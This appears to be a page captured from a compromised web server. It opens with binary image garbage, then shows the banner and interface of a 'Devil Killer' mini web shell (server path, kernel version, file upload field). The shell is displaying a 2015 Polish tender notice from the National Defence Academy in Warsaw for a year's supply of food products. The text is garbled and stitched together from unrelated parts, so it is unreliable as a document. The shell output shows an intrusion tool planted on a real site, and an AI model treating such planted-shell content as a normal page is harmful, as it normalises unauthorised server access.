JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/35572-N-2015.html

<p class="kh_header"><b>Warszawa: DOSTAWA ROŻNYCH PRODUKTÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 35572 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ROŻNYCH PRODUKTÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tuńczyk w sosie własnym - kawałki, op. 200-300 g	kg	300,Mąka ziemniaczana, op. 1 - 2 kg kg	20,Kasza gryczana, op. 1 - 2 kg kg	250,Kasza jęczmienna pęczak, op. 1 - 2 kg	kg	250,Kasza jęczmienna perłowa, op. 1 - 2 kg	kg 250,Cebulki konserwowe po oddzieleniu zalewy op. 0,5 - 1 kg	kg 40, Czosnek konserwowy po oddzieleniu zalewy op. 0,5 - 1 kg kg 40,Marchewka z groszkiem i kukurydzą konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg 700, Marchewka z groszkiem konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg 700,Groszek konserwowy po oddzieleniu zalewy op. 1,5 - 3 kg kg 1600, Seler konserwowy po oddzieleniu zalewy op. 0,5 - 1 kg kg	800,Fasolka konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg kg	1600, Fasola czerwona konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	350,Brzoskwinia konserwowa po oddzieleniu zalewy op. 0,3 - 0,8 kg kg 1200, Ananas konserwowy po oddzieleniu zalewy op. 0,3 - 0,8 kg kg	800,Sok (syrop) zagęszczony - koncentrat op. 0,5 - 1 l l 100,Rodzynki kg 40, Ryż op. 1-2 kg	kg 400,Płatki śniadaniowe czekoladowe op. 1 - 5 kg kg	250,Pieczywo chrupkie (skład: mąka żytnia 50-60proc, pełnoziarnista mąka pszenna 20-30proc, mąka pszenna, odtłuszczone mleko w proszku, ekstrakt słodu jęczmiennego) opakowanie jednostkowe 100-150 g kg 40, Cukier biały op. 1 - 2 kg kg 3200,Cukier w kostkach op. 0,5 - 1 kg kg	1000, Cukier porcjowany op. 2 -5 g	kg 20, Cukier puder op. 0,5 - 1 kg kg	120,Cukier waniliowy op. 0,1 - 0,5 kg	kg	20,Makaron dwujajeczny 9nitki, paski, kolanka) op. 1 - 5 kg	kg	800, Ocet winny l 20, Sos sałatkowy kg	00, Przyprawa do flaków	kg	10,Papryka mielona	kg 20, Pieprz czarny mielony kg 30, Sól spożywcza op. 1-5 kg kg	2000, Barszcz biały w składzie ma zawierać mąkę pszenną 45-40procodtłuszczone mleko w proszku 30-25proc bez dodatku: konserwantów, glutaminianu sodu, barwników proszę podać nazwę producenta	kg 150, Zupa pieczarkowa Zawartość suszonych pieczarek  ( w tym koncentrat) 18proc - 12proc proszę podać nazwę producenta	kg 100, Drożdże piekarskie kg	40, Proszek do pieczenia	kg 40, Miód pszczeli (naturalny) jednoporcjowy kg 800, Łopatka konserwowa kg 175, Szynka konserwowa kg	175, Golonka konserwowa kg	175, Pasztet z Indyka	kg 175, Fasola	kg 400, Groch	kg 400, Ogórki konserwowe 1250g po odcieku kg	1500, Papryka konserwowa 0,900g po odcieku kg	1000, Chrzan tarty Chrzan tarty 70proc-60proc składu produktu proszę podać nazwę producenta	kg	400,Buraczki konserwowe kg	200, Ćwikła z chrzanem	kg 200, Sałatka warzywna 5-składnikowa	kg	1000,Sałatka z czerwonej kapusty	kg	800,Sałatka szwedzka z ogórka kg  700,Szczaw konserwowy kg 200, Przecier ogórkowy kg 300, Pieczarki konserwowe	kg	400, Kukurydza konserwowa	kg 1600, Koncentrat pomidorowy 30proc wyprodukowany ze świeżych pomidorów bez żadnych dodatków proszę podać nazwę producenta	kg	480,Sok jabłkowy 1 l	l	800,Nektar z czarnej porzeczki 1 l	l	800,
Sok pomarańczowy 1 l	l	800,Sok wieloowocowy 1 l	l	800,Dżem  truskawkowy 20 - 30 g	kg	200,Dżem  truskawkowy	kg	400,
Dżem  wiśniowy 20-30 g	kg	200,Dżem  wiśniowy	kg	400,Dżem morelowy 20-30 g	kg	200,Dżem  jagodowy 20-30 g	kg	200,Powidła śliwkowe 20-30 g	kg	230,Jabłka suszone	kg	20,Śliwki suszone	kg	40,Olej jadalny rzepakowy	l	400,Olej jadalny słonecznikowy	l	1600,Margaryny	kg	600,
Mąka pszenna  Szymanowska typ 480	kg	2500,Kasza manna	kg	250,Płatki owsiane	kg	250,Płatki kukurydziane	kg	250,Musli jabłkowe	kg	250,Musli truskawkowe	kg	250,Musli morelowe	kg	250,Krakersy	kg	50,Paluszki solone	kg	150,Cukierki witaminizowane 100g różne smaki	kg	80,
Kakao 10-12proc tł.	kg	300,Herbata czarna granulowana	kg	150,Herbata czarna liściasta	kg	150,Herbata w torebkach (ekspresowa)	kg	20,
Przyprawa do zup w płynie	l	400,Ocet	l	400,Ketchup 4,5-5,5kg zawartość pomidorów w ketchupie 200g-190g na 100g ketchupu proszę podać nazwę producenta 	kg	800,Musztarda 4,5-5,5kg	kg	800,Przyprawa do mięsa bez: sztucznych barwników, konserwantów, glutaminianu sodu
proszę podać nazwę producenta	kg	100,Przyprawa do ryb Bez dodatku konserwantów proszę podać nazwę produktu 	kg	50, Przyprawa do drobiu 
Bez dodatku konserwantów proszę podać nazwę produktu	kg	80,Przyprawa uniwersalna Bez dodatku konserwantów proszę podać nazwę produktu	kg	80,
Majonez 0,3-2 kg	kg	800, Cynamon	kg	20, Bazylia suszona	kg	20,Oregano suszone	kg	20,Liść laurowy	kg	10,Majeranek	kg	10,Ziele angielskie (ziarno)	kg	10,Kwasek cytrynowy	kg	20,Bulion drobiowy Tłuszcz kurzy 4proc-3procproszę podać nazwę producenta	kg	40,Żelatyna spożywcza	kg	20,
Woda pitna but. gazowana 1,5 l	l	7000,Woda pitna but. niegazowana 1,5 l	l	7000,Babeczki korpusy kruche 200g (24szt)	kg	15,
Borówka konserwowa do mięsa 260g	kg	20,Czosnek mielony 50g	kg	40,Galaretka owocowa (różne smaki) W składzie ma  posiadać barwniki pochodzenia naturalnego, ma posiadać koncentraty roślinne np. wiśnia, malina itp. proszę podać nazwę producenta	kg	30,Gałka muszkatołowa mielona 10g kg	10,
Gruszki konserwowe 820g	kg	50,Mąka kukurydziana	kg	20,Morele suszone 200g	kg	30,Kapary w zalewie 100g duże	kg	30,Kotlety sojowe
	kg	10,Majonez  Zawartość żółtka jaja kurzego 7proc- 6procproszę podać nazwę producenta	kg	200,Migdały płatki 100g	kg	20,Oliwki  zielone w zalewie 750g drylowane	kg	100,Oliwki  czarne w zalewie 750g drylowane	kg	20,Orzechy włoskie łuskane 500g	kg	20,Pieprz biały 250g	kg	10,
Pomidory suszone w zalewie 850g	kg	10,Topping czekoladowy 200g	kg	10,Topping owocowy 200g	30,Szparagi konserwowe 212g	kg	40,Sos tabasco 150g	kg	10,Śmietana śnieżka w proszku saszetki 60g	kg	15,Żurawina konserwowa do mięsa 300g	kg	60,Jabłka prażone kostka 900g zawartość jabłek nie mniej niż 85procproszę podać nazwę producenta	kg	100,Groszek ptysiowy 80g	kg	30,Sos sojowy 150g	kg	30,Budyń (waniliowy, śmietankowy) 60g
	kg	130,Kisiel (cytrynowy, jabłkowy) 77g	kg	15,Rosół drobiowy kostka 180g (18szt)  Tłuszcz kurzy 4proc-3procproszę podać nazwę producenta
	kg	100,Pomidory koktajlowe w zalewie 400g	kg	50,Koncentrat barszczu czerwonego 320g	kg	40,Ziarno sezamu 300g	kg	5,
Zupa krem borowikowy 1-2 kg Bez dodatku konserwantów , barwników, glutaminianu sodu, Borowiki  5proc -4procproszę podać nazwę producenta	kg	80,
Zupa krem szparagowy 1- 2 kg Bez dodatku konserwantów , barwników, glutaminianu sodu, Szparagi w proszku 5proc -4procproszę podać nazwę producenta 	kg	40, Sos pieczeniowy ciemny Bez dodatku konserwantów proszę podać nazwę producenta	kg	40,Sos zielony pieprz Bez dodatku konserwantów , barwników, glutaminianu sodu, pieprz zielony 5proc -4procproszę podać nazwę producenta	kg	40,Grzanki ziołowo czosnkowe	kg	100,Borowiki suszone kl.1, 500g
	kg	20,Podgrzybki suszone kl.1 500g	kg	10,Ciastka Delicje różne smaki 147g	kg	100,Ciastka Pieguski różne smaki 135g	kg	100,
Ciastka Markizy różne smaki 250g	kg	100,Ciastka Jerzyki różne smaki 140g	kg	100,Ciastka pierniki 160g 	kg	100,Cukierki czekoladowe mieszanka Wedlowska różne smaki 2,5kg	kg	150,Chipsy Lays różne smaki 70g	kg	200,Chipsy Lays różne smaki 150g	kg	200,Czekolada Wedel mleczna nadziewana różne smaki 100g	kg	800,Czekolada Wedel mleczna z orzechami 100g	kg	200,Czekolada Wedel mleczna  100g	kg	700,Czekolada Wedel gorzka 100g
	kg	400,Czekolada Wedel Bakaliowa 100g	kg	400,Herbata Lipton Yellow Label 100 torebek	kg	100,Herbata owocowa w saszetce ze sznurkiem i etykietą 100 torebek	kg	50,Guma do żucia Orbit 10 drażetek różne smaki	kg	60,Kawa rozpuszczalna Jacobs Cronat Gold 200g	kg	100,Kawa rozpuszczalna Nescafe Gold 200g	kg	100,Kawa rozpuszczalna Maxwell House 200g	kg	100,Cukierki Tik Tak 16g różne smaki	kg	50,Baton Prince polo 52g różne smaki
	kg	70,Baton Pawełek 45g różne smaki	kg	120,Baton Twix 51g różne smaki	kg	70,Baton Kit Kat 40g różne smaki	kg	70,Baton Bajeczny 45g różne smaki
	kg	70,Baton Bounty 57g	kg	70,Baton Grześki 39g różne smaki	kg	120,Baton Mars 42g	kg	70,Baton Snickers 51g	kg	70,Baton Lion 43g
	kg	70,Baton WW 47g różne smaki	kg	70,Cukier trzcinowy nierafinowany 500g otrzymywany z trzciny cukrowej, bez oddzielania melasy i kryształków, o barwie od złotawej do ciemnobrązowej	kg	140,Kasza kuskus o ziarnach ok. 1mm średnicy z pszenicy twardej	kg	100,Kiełki sojowe w zalewie 400-450g	szt.	100,Kukurydza mini w zalewie 800ml	szt.	100,Pomidory suszone w plastrach paczkowane	kg	10,Oleje z pierwszego tłoczenia smakowy różne smaki 0,5l
proszę podać nazwę producenta	l	50,Woda Żywiec 0,5 l niegazowana	szt.	3000,Woda Żywiec 0,5 l gazowana	szt.	2000,Sok 1 l pomarańczowy Tymbark szt.	2000,Sok 1 l jabłkowy -Tymbark-	szt.	1500,Sok 1 l grejpfrutowy czerwony -Tymbark-	szt.	1000,Sok 1 l grejpfrutowy biały -Tymbark-	szt.	500,
Sok 1 l czarna porzeczka -Tymbark-	szt.	1000,Sok 1 l pomidorowy -Tymbark-	szt.	500,Sok 1 l ananas -Tymbark-	szt.	500,Sok 1 l żurawina -Tymbark-	szt.	500,
Sok -Tymbark- 0,2l różne smaki	szt.	2500,Sok -Tymbark- 0,3l różne smaki	szt.	2000,Napój energetyczny Em Pover 0,25 l	szt.	500,Napój energetyczny Red Bull 0,25 l	szt.	500,Sok -Tarczyn- 0,3l różne smaki	szt.	1500,Sok -Hortex- 0,25l różne smaki	szt.	1000,Sok -Hortex- 0,33l różne smaki	szt.	1000,Syrop malinowy 2,85- 3l z dozownikiem	szt.	30,Syrop imbirowy 2,85 3l z dozownikiem	szt.	15,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.24.14.00-3, 15.31.20.00-8, 15.33.11.30-7, 15.33.11.30-7, 15.33.00.00-0, 15.61.00.00-7, 15.83.12.00-4, 15.85.11.00-9, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W celu zabezpieczenia podpisania umowy przez wykonawców, każda oferta musi być zabezpieczona wadium w wysokości 10 200,00 zł (słownie: dziesięć tysięcy dwieście złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	warunek ten będzie spełniony przez Wykonawcę, który posiada: -aktualną decyzję administracyjną wydaną przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. Nr 136, poz. 914 z późn. zm.) oraz ustawą z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.) lub -zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej - zgodnie z art. 61 i art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr l36 poz. 914 z późn. zm.) oraz ustawą z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz. U. z 2006r. Nr 17 poz. 127 z póź. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawca składający ofertę musi wykazać że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jedną dostawę zawierającą w swym przedmiocie dostawę różnych produktów spożywczych, przy czym wartość tej dostawy była nie mniejsza niż 300.000,00 zł brutto, z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawa ta została wykonana, oraz załączy dowody, że dostawa została wykonana lub jest wykonywana należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje; - aktualna decyzja administracyjna wydana przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. Nr 136, poz. 914 z późn. zm.) oraz ustawą z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.) lub - zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej - zgodnie z art. 61 i art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr l36 poz. 914 z późn. zm.). W zakresie dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego: - aktualny certyfikat wydany przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju lub aktualne zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub aktualny protokół z kontroli sanitarnej właściwego organu urzędowej kontroli wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert, potwierdzającego stosowanie systemu HACCP</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Gwarancja niezmienności cen w okresie obowiązywania umowy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
